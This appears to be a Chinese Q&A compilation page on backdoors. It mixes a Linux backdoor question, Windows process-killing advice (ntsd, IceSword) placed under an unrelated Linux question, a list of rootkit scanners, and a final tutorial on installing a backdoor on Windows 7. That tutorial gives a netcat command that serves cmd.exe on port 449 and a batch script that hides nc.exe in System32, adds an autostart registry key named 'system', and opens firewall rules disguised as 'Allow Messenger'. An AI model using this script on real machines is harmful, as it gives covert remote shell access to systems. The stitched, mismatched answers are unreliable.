『壹』 linux開源就沒有後門了嗎
有。linux是一個開源的操作系統,這意味著任何人都可以查看和修改其源代碼,由於linux是開源的,理論上任何人都可以在代碼中添加後門,但是,由於linux社區的廣泛參與和代碼審查,發現和利用後門的機會相對較小。
『貳』 linux系統後台無法使用命令進行操作怎麼辦註:無法重起機子,無法殺進程等。。
Windows XP/2000的任務管理器是一個非常有用的工具,能讓你看到系統中正在運行哪些程序(進程),只要你平時多看任務管理器中的進程列表,熟悉系統的基本進程,就可以隨時發現可疑進程,這對防範木馬和病毒大有裨益!不過有一些可疑進程,你用任務管理器卻無法殺掉,這該怎麼辦呢?
一、哪些系統進程不能關掉
Windows運行的時候,會啟動多個進程。只要你按下「Ctrl+Alt+Del」鍵打開任務管理器,點擊「查看」/選擇列,勾選「PIO(進程標識符)」,然後單擊「進程」標簽,即可看到這些進程。不過有一些進程個人用戶根本用不到,例如Systray.exe(顯示系統托盤小喇叭圖標)、Ctfmon.exe(微軟Office輸入法)、Winampa.exe等,我們完全可以禁止它們,這樣做並不會影響系統的正常運行。
二、如何關閉任務管理器殺不了的進程
如果你在任務管理器中無法關閉某個可疑進程,可以使用下面的方法強行關閉,注意不要殺掉進程表中的系統核心進程:
1. 使用Windows XP/2000自帶的工具
從Windows 2000開始,Windows系統就自帶了一個用戶態調試工具Ntsd,它能夠殺掉大部分進程,因為被調試器附著的進程會隨調試器一起退出,所以只要你在命令行下使用Ntsd調出某進程,然後退出Ntsd即可終止該進程,而且使用Ntsd會自動獲得Debug許可權,因此Ntsd能殺掉大部分的進程。
操作方法:單擊「開始」/程序/附件/命令提示符,輸入命令:ntsd -c q -p PID(把最後那個PID,改成你要終止的進程的PID)。在進程列表中你可以查到某個進程的PID,例如我們要關閉圖1中的Explorer.exe進程,輸入:ntsd -c q -p 408即可。
以上參數-p表示後面跟隨的是進程PID, -c q表示執行退出Ntsd的調試命令,從命令行把以上參數傳遞過去就行了。
2. 使用專門的軟體來殺進程
任務管理器殺不掉的進程,你可以使用專門的軟體關閉。有很多軟體可以殺進程,例如進程殺手、IceSword、柳葉擦眼、系統查看大師、Kill process等。
(1)進程殺手2.5()
它能夠瀏覽系統中正在運行的所有進程,包括用Ctrl+Alt+Del 看不到的進程,可以精簡進程、自動中止系統基本進程以外的所有進程,對木馬和病毒進程有一定清除作用,你可以用它隨時中止任一個正在運行的進程,選中該進程,按「中止進程」按鈕即可。
(2)IceSword()
如今系統級木馬後門功能越來越強,一般都可輕易隱藏進程、埠、注冊表、文件信息,普通進程工具根本無法發現這些「幕後黑手」。IceSword使用大量新穎的內核技術,可以查出所有隱藏進程。
要查看當前進程,請點擊「進程」按鈕,在右部列出的進程中,隱藏的進程會以紅色醒目地標記出,以方便查找系統級後門。如果要結束某進程,可以先選中它(按住Ctrl鍵可選擇多個進程),然後使用右鍵菜單的「結束進程」,即可關閉之。
(3)柳葉擦眼
它可以列出系統中所有的進程(包括隱藏的),並可以殺死進程,能自動標示出系統文件,自動中止基本進程外的所有進程,還具有IE保護功能。
運行軟體後,單擊「柳葉擦眼」可以顯示當前正在運行的所有進程,你只需注意那些「定義級別」為「未知」及「危險」的進程,按「降妖伏魔」按鈕關閉它們即可。
(4)系統查看大師1.0
目前許多木馬都是在後台運行的,它們運行時會隱藏自己的窗口,因此你無法在屏幕上看到它們。該軟體可以獲取隱藏的不可見窗口,讓你發現木馬蹤影、關閉之。
軟體運行後,在左側視圖中點擊「取不可見窗口」按鈕,右側的窗口中就會顯示出所有當前運行的、隱藏的不可見窗口標題,選定其中的可疑窗口,然後點擊右下端的「結束此窗口」按鈕,即可關閉之。如果你要關閉某進程,可以單擊「進程列表」按鈕,選中該進程,然後右擊滑鼠在彈出的窗口中,單擊「結束進程」即可。
『叄』 Linux後門入侵檢測工具以及最新bash漏洞解決方法
Linux後門入侵檢測工具及最新bash漏洞解決方法
Linux後門入侵檢測工具:
chkrootkit:
RKHunter:
最新bash漏洞解決方法:
總結: 使用chkrootkit和RKHunter等工具可以有效檢測Linux系統是否被植入後門或感染rootkit。 對於新發現的bash漏洞,應立即更新bash到最新版本以確保系統安全。
『肆』 如何在Windows,Linux中安裝後門
0×00 准備工作
假設用戶以管理員許可權登錄系統,在Windows 7系統上使用netcat 創建一個後門。
Netcat 功能比較單一, 缺少了許多我們滲透工作中需要的功能。為此我們將創建一個攜帶型的工具包來解決這個問題 :
1.下載額外的文件和附加持續.
2.編輯修改指定文件.
3.快速創建執行後門.
4.控制遠程伺服器並進行惡作劇 :)
為了便於你第一時間獲取到你的工具包,你需要將它放置在一個獨立的U盤或者在線伺服器上。
攜帶型工具(Portable Applications)
攜帶型工具是那些不需要安裝就能直接使用的程序,它們往往將所有的執行環境和核心程序本身一同打包成一個獨立的文件,方便攜帶。在獨立文件執行的過程中會自行釋放額的需求文件,並構建一個可順利執行目標程序的環境。
1.不依賴特定的dll(dll已經打包)
2.不依賴注冊表設置(有可能自行初始化) ,不遺留下任何注冊表操作痕跡
3.操作痕跡最小化,盡量避免一切不必要的操作,導致留下過多的系統操作記錄
創建 Windows 7 工具集
gVim (跨平台的文本編輯器, 提供強大的命令行操作交互)
Wget (下載 windows 64 位版本)
Netcat
有Kali系統的可以用命令 「find / -name nc.exe」搜索到 http://www.kali.org/ 或者下載已經編譯好的版本 http://joncraton.org/blog/46/netcat-for-windows/
0×01初試 Netcat 後門
nc.exe -dLp 449 -e cmd.exe -L 這個選項會開啟一個監聽服務並等待客戶端連接, 在客戶端連接成功之後,會提供相應的交互服務。
– p 指定程序監聽的埠(非管理員許可權只能設置高於1024的埠. 同時不可復用現有埠)
– e 在接收到一個客戶端連接後, 會執行一個特定的程序(這里是cmd.exe), 這個程序負責接下來的會話交互(執行客戶端後期提交的任何命令)
– d 採取靜默監聽模式,避免nc運行過程中,產生過多額外的日誌信息
Windows 7 後門安裝批處理腳本
@echo off
Rem 拷貝文件到系統目錄
x "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y
Rem 修改注冊表,增加後門自啟動代碼.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Rem 添加防火牆規則,開放監聽的449埠,允許外部連接.
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449
Rem 添加防火牆規則,允許nc.exe對外提供連接.
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"